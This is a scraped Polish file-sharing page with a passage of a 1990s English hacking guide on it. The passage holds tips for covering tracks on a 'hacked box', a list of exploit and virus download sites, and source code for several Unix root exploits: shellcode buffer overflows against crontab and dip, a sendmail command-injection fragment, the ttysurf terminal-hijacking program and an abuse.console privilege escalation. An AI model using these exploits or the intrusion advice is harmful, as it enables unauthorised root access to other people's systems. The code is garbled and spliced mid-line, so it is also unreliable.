Index Pedagogika Pilch Tadeusz Zasady Badań Pedagogicznych(txt) Asimov Isaac Science Fiction (Opowiadania).Txt MODELNR2.TXT DROGA (2).TXT WIEZAJ~1.TXT MOCPODSW.TXT ANDRZE~1 (2).TXT LEKCJA46.TXT MALYBCHL.TXT DZIKUS.TXT |
[ Pobierz całość w formacie PDF ] .if your root account changes or you create files that are owned by thewrong group, be sure to chown the filesx.do not use.rhosts if there is already one there that is being usedy.never telnet or ftp to your account from the hacked boxz.don't fuck up their machine! only do what you know how to do.***************************************************** Appendix II - Hacking / Security WWW / ftp sites *****************************************************IRC QuantumG #virusQuantum's Linux Pagehttp://obsidian.me.fau.edu/~quantumNice site for a bit of info and unix exploits!CyberToast's Files sectionHere you will find a nice selection of hacking, crackers, hex editors, viruses,cracks, phreaking, war dialers, scanners, and, misc files.www.ilf.net/~toast/filesReptiles RealmA nice site for many linux exploitswww.users.interport.net/~reptile/linuxFTP site loaded with all kinds of IRC, BOTS, UNIX EXPLOITS, VIRUSES and ZINES!http://ftp.giga.or.at/pub/hackerLinux Security DigestLot's to look at herehttp://king.dom.de/~un/linux-securityLinux Security Alerthttp://bach.cis.temple.edu/linux/linux-security/Linux-AlertsThe Linux Security Home Pagehttp://www.ecst.csuchico.edu/~jtmurphyThese are good sites just to get you started, there are many links on these.Just make sure to browse in your favorite engine and search for words like:hack, linux, unix, crack ect.********************************************************** Appendix III - More exploits for root or other access **********************************************************.1.vixie crontab buffer overflow for RedHat Linux.If crontab is suid it is more then likely exploitable.-----------cut here/* vixie crontab buffer overflow for RedHat Linux** I don't think too many people know that redhat uses vixie crontab.* I didn't find this, just exploited it.*** Dave G.* 10/13/96**/#include#include#include#include#include#define DEFAULT_OFFSET -1240#define BUFFER_SIZE 100 /* MAX_TEMPSTR is 100 */#define HAPPY_FILE "./Window"long get_esp(void){__asm__("movl %esp,%eax\n");}main(int argc, char **argv){int fd;char *buff = NULL;unsigned long *addr_ptr = NULL;char *ptr = NULL;u_char execshell[] ="\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f""\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd""\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";/** The sscanf line reads for 'name' as %[^ =].Neither a space, nor* a '=' character appears below*/int i;int ofs = DEFAULT_OFFSET;/* if we have a argument, use it as offset, else use default */if(argc == 2)ofs = atoi(argv[1]);else if (argc > 2) {fprintf(stderr, "egg [offset]\n");exit(-1);}/* print the offset in use */printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);buff = malloc(4096);if(!buff){printf("can't allocate memory\n");exit(0);}ptr = buff;/* fill start of buffer with nops */memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));ptr += BUFFER_SIZE-strlen(execshell);/* stick asm code into the buffer */for(i=0;i < strlen(execshell);i++)*(ptr++) = execshell[i];addr_ptr = (long *)ptr;for(i=0;i < (878/4);i++)*(addr_ptr++) = get_esp() + ofs;ptr = (char *)addr_ptr;*ptr++ = '=';*ptr++ = 'X';*ptr++ = '\n';*ptr = 0;printf("Writing to %s\n", HAPPY_FILE);/** The sleep is required because as soon as crontab opens the tmp file it* stat's and saves it.After the EDITOR program exists it stats again* and if they are equal then it assumes changes weren't made and exits.*/fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);write (fd, buff, strlen(buff));close(fd);execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL);/* Successful completion */exit(0);}----------- cut here.2.Root dip exploit.in /sbin you will find a symbolic link called dip to a suid root binary.Chances are, if this file is suid, it's sploitable.-------- cut here#include#include#include#include#include#define PATH_DIP "/sbin/dip"u_char shell[] ="\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f""\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd""\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hs";u_long esp() { __asm__("movl %esp, %eax"); }main(){u_char buf[1024];u_long addr;int i, f;strcpy(buf, "chatkey ");addr = esp() - 192;for (i=8; i/tmp/.inetd.conf\">\nR\n$rascii "main(argc, argv)int argc;char **argv;{execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p", EVIL_COMMAND1,argv[1] ? argv[1] : "atreus",0);}----------- cut here.6.ttysurf - grab someone's tty.------------cut here#include#include#include#include#include#include#define DEBUG 1 /* Enable additional debugging info (needed!) */#define USLEEP /* Define this if your UNIX supports usleep() */#ifdef ULTRIX#define TCGETS TCGETP /* Get termios structure */#define TCSETS TCSANOW /* Set termios structure */#endifhandler(signal)int signal; /* signalnumber */{ /* do nothing, ignore the signal */if(DEBUG) printf("Ignoring signal %d\n",signal);}int readandpush(f,string)FILE *f;char *string;{char *cp,*result;int e;struct termios termios;result=fgets(string,20,f); /* Read a line into string */if (result==NULL){ perror("fgets()");return(1);}if (DEBUG){ printf("String: %s\n",string);fflush(stdout);}ioctl(0,TCGETS,&termios); /* These 3 lines turn off input echo *//* echo = (termios.c_lflag & ECHO); */termios.c_lflag=((termios.c_lflag | ECHO) - ECHO);ioctl(0,TCSETS,&termios);for (cp=string;*cp;cp++) /* Push it back as input */{ e=ioctl(0,TIOCSTI,cp);if(epw_name,a->pw_passwd,a->pw_uid,a->pw_gid,a->pw_gecos,a->pw_dir,a->pw_shell);}/* SunOS 5.0 /etc/shadow *//* SunOS4.1+c2 /etc/security/passwd.adjunct */------------ cut here.8.Abuse Root Exploit (linux game program).---------- cut hereThere is a security hole in RedHat 2.1, which installs the game abuse,/usr/lib/games/abuse/abuse.console suid root.The abuse.console programloads its files without absolute path names, assuming the user is runningabuse from the /usr/lib/games/abuse directory.One of these files in theundrv program, which abuse executes as root.If the user is not in theabuse directory when running this, an arbitrary program can be substitutedfor undrv, allowing the user to execute arbitrary commands as root.If abuse.console needs to be run by users other than root at the console,provisions need to be made in the code to not execute or load any filesas root.Program: /usr/lib/games/abuse/abuse.console suid rootAffected Operating Systems: Red Hat 2.1 linux distributionRequirements: account on systemPatch: chmod -s /usr/lib/games/abuse/abuse.consoleSecurity Compromise: rootAuthor: Dave M.(davem@cmu.edu)Synopsis: abuse [ Pobierz całość w formacie PDF ] |
||||
Wszelkie Prawa Zastrzeżone! Kawa była słaba i bez smaku. Nie miała treści, a jedynie formę. Design by SZABLONY.maniak.pl. | |||||